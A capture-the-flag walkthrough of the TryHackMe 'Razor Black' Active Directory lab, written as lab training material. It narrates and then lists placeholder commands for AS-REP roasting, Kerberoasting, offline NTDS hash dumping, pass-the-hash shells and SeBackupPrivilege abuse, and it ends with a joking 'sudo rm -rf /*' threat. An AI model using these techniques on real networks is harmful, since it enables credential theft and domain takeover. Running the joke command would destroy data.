Introduction
In this walkthrough, we cover Active Directory penetration testing and privilege escalation through techniques such as AS-REP roasting and Kerberoasting.
These guys call themselves hackers. Can you show them who’s the boss?
Throw something like a rock on the big green thingy on the right side here to deploy your box.
The box has ICMP enabled. So, look at ping first before starting recon and stop slapping `-Pn` on nmap.
This room is proudly made by: Xyan1d3
Recon and Initial Foothold
I started with a basic Nmap scan to see what ports were open. I found services like Kerberos, LDAP, and an NFS file share. I mounted the NFS share and found an Excel file with employee names and the first flag.
Using the employee list, I created a user list for Active Directory and performed AS-REP roasting to get a user hash. I cracked the hash with Hashcat and got a password.
With the username and password, I tried to access the SMB shares but was denied access to the “trash” share, which I knew contained a zip file. I used Metasploit to find other valid users and discovered that another user had the same password. This time, I was able to access the share and download the zip file. I then used zip2john and John the Ripper to crack the zip file’s password.
Hash Extraction and Privilege Escalation
Inside the zip file, I found a database of hashes. I used secretsdump.py in offline mode to extract hashes from the `system.hive` and `ntds.dit` files. I then used the `cut` command to separate the usernames and hashes into different files.
I used CrackMapExec to check which of the extracted hashes was valid for a specific user, “alvitrova,” and then used that hash with evil-winrm to get a shell on the system. I found an XML file with an encoded string, which I decoded using a PowerShell command to get the flag.
I then used GetUserSPNs.py to request a service ticket for another user, “zn,” and cracked the resulting hash to get their password. I got a shell as “zn” and found another encoded flag in an XML file.
To get root, I used the `whoami /all` command and found that the “zn” user had the SeBackupPrivilege. I exploited this by creating a `diskshadow` script to back up the `ntds.dit` and `system.hive` files. I downloaded these files to my machine and used secretsdump.py again to get the administrator hash.
Root and Final Secrets 🚩
With the administrator hash, I used evil-winrm to get a root shell. I found the `root.xml` file, which contained an encoded password that I decoded to get the root flag.
I also found a flag for the user “tyson” in a text file in their user directory.
For the final secret, I navigated to the “Top Secret” directory in “Program Files” and found an image file. The image contained a message about exiting vim, leading me to the final secret: `:wq`.
Technical Commands Used
Here are the technical commands I used in the terminal during the demonstration:
Nmap and NFS
sudo nmap -sV [IP address]
nmap -p [port] [IP address]
showmount -e [IP address]
sudo mount -t nfs -o vers=3 [IP address]:/users /home/user/users_thm
File and Hash Operations
python3 GetNPUsers.py -dc-ip [IP address] [domain]/ -usersfile users_rz.txt -format hashcat -outputfile asrep_hash.txt
hashcat -m 18200 asrep_hash.txt [wordlist]
zip2john [zip_file] > [output_hash_file]
john --wordlist=[wordlist] [hash_file]
python3 secretsdump.py -system [system_file] -ntds [ntds_database] local -outputfile hashes_v1.txt
cut -d':' -f1 hashes_v1.txt > users_v2.txt
cut -d':' -f4 hashes_v1.txt > hashes_v2.txt
SMB and Metasploit
smbmap -u [username] -p [password] -H [IP address]
use auxiliary/scanner/smb/smb_enumusers
smbclient //[IP address]/[share_name] -U [username]%[password]
Shells and Privilege Escalation
crackmapexec smb [IP address] -u [username] -H [hash_file]
evil-winrm -i [IP address] -u [username] -H [hash]
$credential = Import-CliXml -Path "[path_to_xml_file]"
$credential.GetNetworkCredential().Password
python3 GetUserSPNs.py -dc-ip [IP address] [domain]/[username] -hashes :[nt_hash] -request -outputfile zn_hash_v2.txt
whoami /all
diskshadow.exe /s diskshadow.txt
Import-Module [dll_file]
Copy-FileBackupPrivilege -Source "[source_path]" -Destination "[destination_path]"
Video Walk-through
TryHackMe Razor Black Room Answers
What is the zip file’s password?
What is Ljudmila’s Flag?
What is Xyan1d3’s password?
What is Xyan1d3’s Flag?
What is the root Flag?
What is Tyson’s Flag?
What is the complete top secret?
Did you like your cookie?
Say Yes or I will do `sudo rm -rf /*` on your PC